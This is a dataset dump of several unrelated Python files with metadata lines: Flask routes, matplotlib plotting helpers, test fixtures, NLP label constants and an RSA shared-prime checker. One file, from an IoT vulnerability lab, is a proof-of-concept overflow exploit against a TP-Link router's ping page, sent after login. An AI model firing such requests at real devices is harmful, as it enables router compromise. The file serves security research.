abort(401)
else:
current_user.remove_quote(quote)
return redirect(f"/user/{current_user.usertag}")
# If the quote doesn't exist
return abort(404)
@server_routes.route("/follow/<string:usertag>")
@login_required
def follow(usertag: str):
"""Follow the user given at endpoint and redirect to his profile.
Notes
-----
- If the user is anonymous, he is redirected to /login;
- If the user does not exist, a 404 status code is raised.
"""
user = find_user(usertag)
if user is None:
abort(404)
current_user.follow(user)
return redirect(f"/user/{usertag}")
@server_routes.route("/unfollow/<string:usertag>")
@login_required
def unfollow(usertag: str):
user = find_user(usertag)
if user is None:
abort(404)
current_user.unfollow(user)
return redirect(f"/user/{usertag}")
@server_routes.route("/logout")
@login_required
def logout():
"""Ends a flask_login user session."""
logout_user()
return redirect('/')
| 23.592593 | 72 | 0.675039 | 264 | 1,911 | 4.734848 | 0.272727 | 0.0616 | 0.0544 | 0.0264 | 0.344 | 0.2976 | 0.2976 | 0.2976 | 0.2976 | 0.168 | 0 | 0.01417 | 0.22449 | 1,911 | 80 | 73 | 23.8875 | 0.829285 | 0.259027 | 0 | 0.292683 | 0 | 0 | 0.118871 | 0.074294 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.195122 | 0 | 0.414634 | 0.04878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad99c74c699cc24e8fcbe1b0d05f9178ebff68bd | 16,043 | py | Python | tool/auxiliary_fuction.py | Anfany/Machine-Learning-Competition-by-Python3 | 2900fa40544fa36b135e824a43a8c31de9c73d92 | [
"MIT"
] | 1 | 2019-07-05T04:19:33.000Z | 2019-07-05T04:19:33.000Z | tool/auxiliary_fuction.py | Anfany/Machine-Learning-Competition-by-Python3 | 2900fa40544fa36b135e824a43a8c31de9c73d92 | [
"MIT"
] | null | null | null | tool/auxiliary_fuction.py | Anfany/Machine-Learning-Competition-by-Python3 | 2900fa40544fa36b135e824a43a8c31de9c73d92 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
# &Author AnFany
# 数据概览中需要的辅助函数:绘制图的函数,以及产生数据的函数
import re
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt # 绘图
from pylab import mpl # 中文显示
from collections import Counter
import seaborn as sns
import matplotlib.gridspec as gridspec
import data_report_config as drc
mpl.rcParams['axes.unicode_minus'] = False # 显示负号
plt.rcParams['font.family'] = ['Arial Unicode MS']
# 处理标签数据的函数,防止相邻的标签字符数过长,产生交叉,影响展示
def handle_str(x_data, length=8):
"""
每间隔length个字符就换行
:param x_data: 标签数据,列表
:param length: 间隔数
:return: 处理后的标签的列表
"""
new_data = []
for i in x_data:
i = str(i)
new_data.append(re.sub(r"(.{%d})" % length, "\\1-\n", i))
return new_data
# 产生绘制柱状图需要的数据
def generate_bar(data):
"""
产生绘制柱状图需要的数据
:param data: 类别型特征数据
:return: 标签数据,标签数据对应的数值数据(按照数值的降序排列)
"""
data_dict = Counter(data)
sort_dict = sorted(data_dict.items(), key=lambda x: x[1], reverse=True)
x_data, y_data = [], []
for j in sort_dict:
x_data.append(j[0])
y_data.append(j[1])
return x_data, y_data
# 绘制柱状图的函数:matplotlib
def plot_bar(x_data, y_data, title, fig_name):
"""
绘制柱状图
:param x_data: 标签数据,列表
:param y_data: 标签数据对应的数量,列表
:param title: 图片标题,字符串
:param fig_name: 图片名,字符串
:return:
"""
# 绘图
plt.style.use('ggplot')
fig, ax = plt.subplots(figsize=(9, 6))
# 处理较长的标签
x_data = handle_str(x_data)
# 绘制竖直柱状图
ax.bar(x_data, y_data, width=.3)
# 去除四周的边框 (spine.set_visible(False))
[spine.set_visible(False) for spine in ax.spines.values()]
# 去除 x 和 y 轴之间无用的刻度 tick
ax.tick_params(top=False, left=False, right=False)
plt.yticks([]) # 去除y坐标轴标签
# # 实际的值展示
vmax = max(y_data)
for i, value in zip(x_data, y_data):
ax.text(i, value + vmax * 0.02, '%d' % value, va='center', fontsize=12)
plt.title(title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
# 绘制直方图的函数:seaborn
def plot_hist(x_data, title, fig_name):
"""
绘制直方图
:param x_data: 数据列表
:param title: 图片标题,字符串
:param fig_name: 图片名,字符串
:return: 直方图
"""
plt.style.use('ggplot')
plt.figure(figsize=(9, 6), dpi=100) # 通过dpi参数指定图像的分辨率
sns.distplot(x_data, hist=True, kde=True)
plt.title(u'%s' % title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
# 绘制分类柱状图需要的数据
def generate_bar_type(x_data, y_data):
"""
绘制分类柱状图需要的数据
:param x_data: 类别数据,列表
:param y_data: 标签数据,列表
:return: 类别集合。标签集合(按照数量的多少排序)。{类别:{标签:数量}}的字典
"""
# 首先确定标签集合的顺序
la_dict = Counter(y_data)
sort_dict = sorted(la_dict.items(), key=lambda x: x[1], reverse=True)
new_y = [j[0] for j in sort_dict]
# 获取类别的集合
type_list = sorted(list(set(x_data)), reverse=True)
# 获取字典
data_dict = {h: Counter([j for i, j in zip(x_data, y_data) if i == h]) for h in type_list}
return type_list, new_y, data_dict
# 绘制带有数据的分类柱状图的函数
def plot_hist_with_type(x_data, y_data, data_dict, title, fig_name):
"""
绘制柱状图
:param x_data: 类别集合,字符串列表
:param y_data: 标签集合,列表
:param data_dict: 格式为{类别:{标签:数量}}的字典
:param title: 图片标题,字符串
:param fig_name: 图片名,字符串
:return:
"""
fig = plt.figure()
gs = gridspec.GridSpec(3, 1)
ax0 = fig.add_subplot(gs[:2, :])
ax1 = fig.add_subplot(gs[2, 0])
fig.subplots_adjust(hspace=0.8)
sign = 1
# 需要将y_data中的元素变为字符串
str_y_data = handle_str(y_data)
cc = [] # 定义柱状的起始数据
table_data = []
for index, t in enumerate(x_data):
plot_data = [data_dict[t][h] if h in data_dict[t] else 0 for h in y_data]
table_data.append([str(j) for j in plot_data])
if sign:
ax0.bar(str_y_data, plot_data, label='类:%s' % t, width=0.3)
cc = np.array(plot_data)
sign = 0
else:
ax0.bar(str_y_data, plot_data, label='类:%s' % t, bottom=cc, width=0.3)
cc += np.array(plot_data)
ax0.legend()
ax0.set_title(u'%s' % title)
x_data.reverse()
table_data.reverse()
# 添加数据表格
# 计算类别比例
title_type = [[h, sum(data_dict[h].values())] for h in x_data]
# 类别
str_type = '类%s' % title_type[0][0]
# 比值
str_pre = '1'
num = title_type[0][1]
for jj in title_type[1:]:
str_type += ':类%s' % jj[0]
str_pre += ':%.3f' % (jj[1] / num)
[spine.set_visible(False) for spine in ax1.spines.values()]
ax1.set_xticks([])
ax1.set_yticks([])
ax1 = plt.gca()
ax1.patch.set_facecolor("white")
# 数据最后一行加上类别的比值
x_data += ['比例']
str_p = []
for i in range(len(table_data[0])):
num = float(table_data[0][i])
str_per = '1:'
for j in range(1, len(table_data)):
if num != 0:
str_per += '%.3f' % (float(table_data[j][i]) / num)
else:
str_per += '0'
str_p.append(str_per)
table_data.append(str_p)
ax1.set_xlabel(u'样本:' + str_type + ',比例' + str_pre)
ax1.table(cellText=table_data, rowLabels=x_data, loc='center', cellLoc='center')
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
# 生成分类概率密度的函数
def generate_data_for_plot_distribution(x_data, y_data):
"""
输出每个类别对应的数据的列表的字典
:param x_data: 类别数据列表
:param y_data: 数值型数据列表
:return: {类别:[数据列表]}的字典
"""
digit_data_dict = {}
for key, value in zip(x_data, y_data):
if key in digit_data_dict:
digit_data_dict[key].append(value)
else:
digit_data_dict[key] = [value]
return digit_data_dict
# 绘制分类标识的概率密度图
def plot_density_with_type(data_dict, title, fig_name, xlabel):
"""
绘制分类标识的概率密度图
:param data_dict: 每一类对应的数据列表的字典
:param title: 图片的标题
:param fig_name: 保存图片的名称
:param xlabel: X轴标题
:return:
"""
plt.figure()
for j, t in enumerate(sorted(list(data_dict.keys()))):
sns.distplot(list(data_dict[t]), hist=True, label='类: %s' % str(t))
plt.title(u'%s' % title)
plt.legend()
plt.xlabel(u'%s' % xlabel)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
# 计算序列间的皮尔逊系数
def get_pearson(data1, data2):
"""
计算数据间的皮尔逊系数
:param data1: 数据1,列表
:param data2: 数据2,列表
"""
x1, x2 = np.array(data1), np.array(data2)
# 求和
xy = np.sum(x1 * x2)
# 求平方和
sx1 = np.sum(x1 ** 2)
sx2 = np.sum(x2 ** 2)
return xy/((sx1 ** 0.5) * (sx2 ** 0.5))
# 绘制散点图
def plot_scatter(data1, data2, title, fig_name, labelx, labely):
"""
绘制数据间的散点图
:param data1: 数据1,列表
:param data2: 数据2,列表
:param title: 图片的标题
:param fig_name: 保存的图片名称
:param labelx: X轴标题
:param labely: Y轴标题
:return: 散点图
"""
plt.style.use('ggplot')
plt.figure()
plt.plot(data1, data2, 'o')
plt.title(u'%s,皮尔逊系数:%.4f' % (title, get_pearson(data1, data2)))
plt.xlabel(u'%s' % labelx)
plt.ylabel(u'%s' % labely)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_two_type_type_pie(data1, data2, data3, title, fig_name):
"""
data1,data2均是类别型特征的值的列表。 data3是类别型特征。绘制组合特征值组合的分类饼图
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 数据列表3
:param title: 图片的标题
:param fig_name: 保存的图片名称
:return: 饼图
"""
# 2个类别特征的值
type_data1 = sorted(list(set(data1)))
type_data2 = sorted(list(set(data2)))
# 目标特征的值
t_type = sorted(list(set(data3)))
# 特征值数少的作为行
if len(type_data1) > len(type_data2):
type_data1, type_data2 = type_data2, type_data1
data1, data2 = data2, data1
# 设置图
fig, axes = plt.subplots(nrows=len(type_data1), ncols=len(type_data2))
# 根据饼图中人数的多少。定义饼图的大小。
min_num, max_num = 0.9, 1.9
size_dict = {}
count_dict = {}
for a in type_data1:
for b in type_data2:
pie_data = []
for c, d, e in zip(data1, data2, data3):
if a == c and b == d:
pie_data.append(e)
size_dict['%s_%s' % (str(a), str(b))] = len(pie_data) / len(data3)
count_dict['%s_%s' % (str(a), str(b))] = pie_data
trans_size_dict = {h: (size_dict[h] - min(size_dict.values()) / (max(size_dict.values()) - min(size_dict.values()))
* (max_num - min_num) + min_num) for h in size_dict}
# 定义图的位置
sign = 0
for a in type_data1:
for b in type_data2:
# 计算
new_dict = {}
for k in count_dict['%s_%s' % (str(a), str(b))]:
if k in new_dict:
new_dict[k] += 1
else:
new_dict[k] = 1
# 数值列表
data_pie = [new_dict[o] if o in new_dict else 0 for o in t_type]
label = ['类%s:\n' % tt + str(dd) if dd != 0 else '' for dd, tt in zip(data_pie, t_type)]
axes[sign // len(type_data2), sign % len(type_data2)].pie(data_pie,
labels=label,
radius=trans_size_dict['%s_%s' % (str(a), str(b))],
labeldistance=.2)
if sign // len(type_data2) == len(type_data1) - 1:
axes[sign // len(type_data2), sign % len(type_data2)].set_xlabel(b)
if sign % len(type_data2) == 0:
axes[sign // len(type_data2), sign % len(type_data2)].set_ylabel(a)
sign += 1
fig.suptitle(u'%s' % title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_one_type_type_box(data1, data2, data3, title, fig_name, labelx, labely, name):
"""
data1是连续特征的值的列表,data2是类别型特征的值的列表。 data3是类别型特征。绘制组合特征值组合的分类箱图
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 数据列表3
:param title: 图片的标题
:param fig_name: 保存的图片名称
:param labelx: X轴标题
:param labely: Y轴标题
:param name: 图例的名称
:return: 饼图
"""
df = pd.DataFrame()
df['number'] = data1
df['type'] = data2
df['target'] = data3
plt.figure(figsize=(13, 10), dpi=80)
sns.boxplot(x='type', y='number', data=df, hue='target')
for i in range(len(df['type'].unique())-1):
plt.vlines(i+.5, 10, 45, linestyles='solid', colors='gray', alpha=0.2)
plt.title(u'%s' % title, fontsize=22)
plt.xlabel(u'%s' % labely)
plt.ylabel(u'%s' % labelx)
plt.legend(title=name)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_scatter_type(data1, data2, data3, title, fig_name, label1, label2):
"""
绘制data1和data2的散点图,其中data3中的值为图例。如果类别大于10个类别,需要在程序中添加颜色。否则会导致不同类颜色相同
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 代表图例的数据列表
:param title: 图片的标题
:param fig_name: 保存的图片名称
:param label1: X轴标题
:param label2: Y轴标题
:return: 散点图
"""
fig, ax = plt.subplots()
legend_list = list(set(data3))
# 10种颜色的列表
c_list = ['k', 'g', 'c', 'b', 'y', 'r', 'm', 'tab:brown', 'tab:blue', 'tab:gray', 'tab:pink']
for j in range(len(legend_list)):
data_1 = [a for a, b in zip(data1, data3) if b == legend_list[j]]
data_2 = [c for c, d in zip(data2, data3) if d == legend_list[j]]
ax.scatter(data_1, data_2, c=c_list[j % 10], label=legend_list[j % 10], alpha=0.9, edgecolors='none', s=50)
ax.legend()
plt.title(u'%s' % title)
plt.xlabel(u'%s' % label1)
plt.ylabel(u'%s' % label2)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_scatter_3d(data1, data2, data3, title, fig_name, label1, label2, label3):
"""
绘制3d的散点图
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 数据列表3
:param title: 图片的标题
:param fig_name: 保存的图片名称
:param label1: X轴标题
:param label2: Y轴标题
:param label3: Z轴标题
:return: 散点图
"""
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(data1, data2, data3)
ax.set_xlabel(u'%s' % label1)
ax.set_ylabel(u'%s' % label2)
ax.set_zlabel(u'%s' % label3)
plt.title(u'%s' % title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_two_type_num_box(data1, data2, data3, title, fig_name):
"""
data1,data2均是类别型特征的值的列表。 data3是连续型特征,特征值的组合采用箱图
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 数据列表3
:param title: 图片的标题
:param fig_name: 保存的图片名称
:return: 饼图
"""
plt.style.use('ggplot')
# 2个类别特征的值
type_data1 = sorted(list(set(data1)))
type_data2 = sorted(list(set(data2)))
# 特征值数少的作为行
if len(type_data1) > len(type_data2):
type_data1, type_data2 = type_data2, type_data1
data1, data2 = data2, data1
# 设置图
fig, axes = plt.subplots(nrows=len(type_data1), ncols=len(type_data2))
if len(data1) == 0 or len(data2) == 0 or len(data3) == 0:
return print('绘图数据出现空列表')
min_num, max_num = min(data3), max(data3)
sign = 0
for a in type_data1:
for b in type_data2:
pie_data = []
for c, d, e in zip(data1, data2, data3):
if a == c and b == d:
pie_data.append(e)
if len(type_data1) == 1:
if len(type_data2) != 1:
axes[sign % len(type_data2)].boxplot(pie_data, showmeans=True, labels=[''])
# 设置同样的y轴区间
axes[sign % len(type_data2)].set_ylim(min_num, max_num)
# 最后一行
axes[sign % len(type_data2)].set_xlabel(b)
# 第一列
if sign % len(type_data2) == 0:
axes[sign % len(type_data2)].set_ylabel(a)
else:
axes[sign % len(type_data2)].set_yticks(())
else:
axes.boxplot(pie_data, showmeans=True, labels=[''])
# 设置同样的y轴区间
axes.set_ylim(min_num, max_num)
# 最后一行
axes.set_xlabel(b)
axes.set_ylabel(a)
else:
axes[sign // len(type_data2), sign % len(type_data2)].boxplot(pie_data, showmeans=True, labels=[''])
# 设置同样的y轴区间
axes[sign // len(type_data2), sign % len(type_data2)].set_ylim(min_num, max_num)
# 最后一行
if sign // len(type_data2) == len(type_data1) - 1:
axes[sign // len(type_data2), sign % len(type_data2)].set_xlabel(b)
# 第一列
if sign % len(type_data2) == 0:
axes[sign // len(type_data2), sign % len(type_data2)].set_ylabel(a)
# 只要是第一列的,不是最后一行,只保留y轴
if sign // len(type_data2) != len(type_data1) - 1:
axes[sign // len(type_data2), sign % len(type_data2)].set_xticks(())
else:
# 只要不是第一列的,最后一行,只保留x轴
if sign // len(type_data2) == len(type_data1) - 1:
axes[sign // len(type_data2), sign % len(type_data2)].set_yticks(())
else:
axes[sign // len(type_data2), sign % len(type_data2)].set_yticks(())
axes[sign // len(type_data2), sign % len(type_data2)].set_xticks(())
sign += 1
fig.suptitle(u'%s' % title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
| 32.410101 | 126 | 0.546407 | 2,194 | 16,043 | 3.829079 | 0.165907 | 0.052494 | 0.055708 | 0.064754 | 0.475301 | 0.444233 | 0.42614 | 0.401619 | 0.343054 | 0.325914 | 0 | 0.030628 | 0.314156 | 16,043 | 494 | 127 | 32.475709 | 0.732891 | 0.16462 | 0 | 0.324723 | 0 | 0 | 0.033637 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055351 | false | 0 | 0.03321 | 0 | 0.110701 | 0.00369 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad9c98ba1ccef3f213cfd946fa70d293d40539b0 | 482 | py | Python | tests/conftest.py | revenants-cie/terraform-github-revdb-repository-manager | 237d94e58ae638345d43c1e78aa1fd1232521b97 | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | revenants-cie/terraform-github-revdb-repository-manager | 237d94e58ae638345d43c1e78aa1fd1232521b97 | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | revenants-cie/terraform-github-revdb-repository-manager | 237d94e58ae638345d43c1e78aa1fd1232521b97 | [
"Apache-2.0"
] | 1 | 2022-02-22T01:11:14.000Z | 2022-02-22T01:11:14.000Z | import boto3
import pytest
from terraform_ci import setup_environment
TEST_ACCOUNT = "114198773012"
REGION = "us-east-2"
# setup terraform environment
setup_environment()
assert boto3.client("sts").get_caller_identity().get("Account") == TEST_ACCOUNT
@pytest.fixture(scope="session")
def asg_client():
asg = boto3.client("autoscaling", region_name=REGION)
return asg
@pytest.fixture()
def ec2_client():
ec2 = boto3.client("ec2", region_name=REGION)
return ec2
| 20.956522 | 79 | 0.746888 | 63 | 482 | 5.539683 | 0.47619 | 0.094556 | 0.091691 | 0.126075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050119 | 0.130705 | 482 | 22 | 80 | 21.909091 | 0.782816 | 0.056017 | 0 | 0 | 0 | 0 | 0.11479 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ada2409612db55188edf6ecbf3b81c60ff68e026 | 1,817 | py | Python | JointBioER/DDI/src/constants.py | lingluodlut/JointBioER | e99ce9346624e7f3d48bdab726d79c7c65a286fb | [
"Apache-2.0"
] | 6 | 2019-01-21T17:08:23.000Z | 2020-12-03T06:30:40.000Z | JointBioER/DDI/src/constants.py | duterscmy/JointBioER | e99ce9346624e7f3d48bdab726d79c7c65a286fb | [
"Apache-2.0"
] | 1 | 2020-06-02T06:45:21.000Z | 2020-07-30T19:08:35.000Z | JointBioER/DDI/src/constants.py | duterscmy/JointBioER | e99ce9346624e7f3d48bdab726d79c7c65a286fb | [
"Apache-2.0"
] | 4 | 2019-04-09T13:17:19.000Z | 2021-07-21T10:57:26.000Z | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 20 10:56:05 2017
@author: cmy
"""
#一些超参数
#bils = 250#神经网络双向LSTM神经元数
#ls = 100#神经网络单向LSTm神经元数
wv = 100#词向量维度
label_mode = 'BIOES'#标注模式
if_repeat = 'Y'#是否允许实体参与多个关系
len_sentence = 117#句子的最大长度,即每个样本的token序列长度,最长为117
len_word = 25
rl2i = {'ME':0,'AD':1 ,'EF':2,'IN':3}#关系类别到索引的映射
el2i = {'drug':0,'group':1,'brand':2,'drug_n':3}#实体类别到索引的映射
label = ['B','I','E','S']
entit = ['drug','group','brand','drug_n']
relat = ['EF','AD','ME','IN','MU']
dirct = ['1','2','M']
label2index = {}
index2label = {}
B_label = []
I_label = []
E_label = []
S_label = []
O_label = []
nowindex = 0
label2index['O'] = nowindex
nowindex += 1
for l in label:
for e in entit:
label2index[l+'-'+e] = nowindex
if l == 'B':
B_label.append(nowindex)
elif l == 'I':
I_label.append(nowindex)
elif l == 'E':
E_label.append(nowindex)
elif l == 'S':
S_label.append(nowindex)
nowindex += 1
for l in label:
for e in entit:
for r in relat:
for d in dirct:
label2index[l+'-'+e+'-'+r+'-'+d] = nowindex
if l == 'B':
B_label.append(nowindex)
elif l == 'I':
I_label.append(nowindex)
elif l == 'E':
E_label.append(nowindex)
elif l == 'S':
S_label.append(nowindex)
nowindex +=1
for each in label2index:
index2label[label2index[each]] = each
i2l_dic = index2label
l2i_dic = label2index
num_class = len(l2i_dic)#多分类类别
relationmap = {'ME':['ME','MU'],'AD':['AD','MU'],'EF':['EF','MU'],'IN':['IN','MU'],'MU':['ME','AD','EF','IN','MU']}
dirmap = {'1':['2','M'],'2':['1','M'],'M':['1','2','M']}
| 25.236111 | 115 | 0.508531 | 246 | 1,817 | 3.662602 | 0.337398 | 0.097669 | 0.168701 | 0.153163 | 0.335183 | 0.335183 | 0.335183 | 0.335183 | 0.335183 | 0.335183 | 0 | 0.049847 | 0.282334 | 1,817 | 71 | 116 | 25.591549 | 0.641104 | 0.109521 | 0 | 0.425926 | 0 | 0 | 0.081454 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ada2787156ba695d0fbb85897946a88cbd2d7dbb | 2,577 | py | Python | TP-Link/CVE-2017-13772/firmadyne-emu/tools/debug.py | CrackerCat/IoT-vulhub | cf0b7d4b5f203a4d7b0964e1a532bdba1ca67073 | [
"MIT"
] | null | null | null | TP-Link/CVE-2017-13772/firmadyne-emu/tools/debug.py | CrackerCat/IoT-vulhub | cf0b7d4b5f203a4d7b0964e1a532bdba1ca67073 | [
"MIT"
] | null | null | null | TP-Link/CVE-2017-13772/firmadyne-emu/tools/debug.py | CrackerCat/IoT-vulhub | cf0b7d4b5f203a4d7b0964e1a532bdba1ca67073 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 _*-
import urllib
import base64
import hashlib
import requests
import socks, socket
socks.set_default_proxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9999)
socket.socket = socks.socksocket
session = requests.Session()
session.verify = False
def login(ip, user, pwd):
hash = hashlib.md5()
hash.update(pwd)
auth_string = "%s:%s" % (user, hash.hexdigest())
encoded_string = base64.b64encode(auth_string)
encoded_string = urllib.quote(" " + encoded_string)
print(encoded_string)
headers={"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Referer": "http://192.168.0.1/",
"Cookie": "Authorization=Basic%s" % encoded_string,
"Upgrade-Insecure-Requests": "1"}
params = {"Save": "Save"}
url = "http://" + ip + "/userRpm/LoginRpm.htm"
resp = session.get(url, params=params, headers=headers, timeout=10)
url = "http://%s/%s/userRpm" % (ip, (resp.text).split("=")[2].split("/")[3])
cookie = "Authorization=Basic%s" % encoded_string
return url, cookie
def exploit(url, auth):
test = "AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AA" \
"KAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"#200
params = {'ping_addr': test,
'doType':'ping',
'isNew':'new',
'sendNum':'20',
'pSize':'64',
'overTime':'800',
'trHops':'20'}
headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Referer": "%s" % url,
"Cookie": auth,
"Upgrade-Insecure-Requests": "1"}
resp = session.get(url, params=params, headers=headers)
print(resp.text)
url, auth = login("192.168.2.2", "admin", "admin")
print(url + "/PingIframeRpm.htm")
print(auth)
exploit(url + "/PingIframeRpm.htm", auth)
| 41.564516 | 127 | 0.609624 | 332 | 2,577 | 4.683735 | 0.36747 | 0.018006 | 0.007717 | 0.029582 | 0.4 | 0.4 | 0.351125 | 0.351125 | 0.29582 | 0.29582 | 0 | 0.066144 | 0.207994 | 2,577 | 61 | 128 | 42.245902 | 0.695737 | 0.008925 | 0 | 0.222222 | 0 | 0.111111 | 0.430811 | 0.22697 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.092593 | 0 | 0.148148 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8db1a1d70cf59d0ac902523c7f2f11e2ec62173 | 748 | py | Python | test/core/test_docs.py | andrjas/data_check | 12ba740fcf54261bed15f909290649e8350474da | [
"MIT"
] | 1 | 2020-12-26T23:59:42.000Z | 2020-12-26T23:59:42.000Z | test/core/test_docs.py | andrjas/data_check | 12ba740fcf54261bed15f909290649e8350474da | [
"MIT"
] | null | null | null | test/core/test_docs.py | andrjas/data_check | 12ba740fcf54261bed15f909290649e8350474da | [
"MIT"
] | null | null | null | from os import O_TRUNC
from pathlib import Path
import re
def all_click_options():
main_py = Path(__file__).parent.parent.parent / "data_check" / "__main__.py"
assert main_py.exists()
options = re.findall(r'"--?[^"\s]+"', main_py.read_text())
return [o.rstrip('"').lstrip('"') for o in options]
def test_all_options_are_documented():
all_options = all_click_options()
print(all_options)
usage_md = Path(__file__).parent.parent.parent / "docs" / "usage.md"
assert usage_md.exists()
usage_txt = usage_md.read_text()
join = []
for opt in all_options:
if re.search(r"\* \`data_check\s+[^\`]*" + opt + "[\`\s\/]", usage_txt):
join.append(opt)
assert set(join) == set(all_options)
| 29.92 | 80 | 0.643048 | 107 | 748 | 4.149533 | 0.411215 | 0.112613 | 0.067568 | 0.09009 | 0.117117 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18984 | 748 | 24 | 81 | 31.166667 | 0.732673 | 0 | 0 | 0 | 0 | 0 | 0.105615 | 0.028075 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.105263 | false | 0 | 0.157895 | 0 | 0.315789 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8de2b2cdb9084b06d486d87d93409815d89620b | 703 | py | Python | badkeys/rsakeys/sharedprimes.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | 9 | 2022-01-14T03:32:34.000Z | 2022-03-22T13:47:45.000Z | badkeys/rsakeys/sharedprimes.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | null | null | null | badkeys/rsakeys/sharedprimes.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | 1 | 2022-03-14T11:36:15.000Z | 2022-03-14T11:36:15.000Z | import gmpy2
from importlib.resources import open_binary
_moduli = {}
_supported_bits = [512, 768, 1024, 2048, 4096]
def sharedprimes(n, e=0):
global _moduli
bits = n.bit_length()
if bits not in _supported_bits:
return False
if bits not in _moduli:
with open_binary("badkeys.keydata", f"primes{bits}.dat") as f:
_moduli[bits] = gmpy2.from_binary(f.read())
breakme = gmpy2.gcd(n, _moduli[bits])
if breakme == 1:
return False
if gmpy2.is_prime(breakme):
p = breakme
q = n // p
if n == (p * q):
return {"detected": True, "p": int(p), "q": int(q)}
# Factoring failed
return {"detected": True}
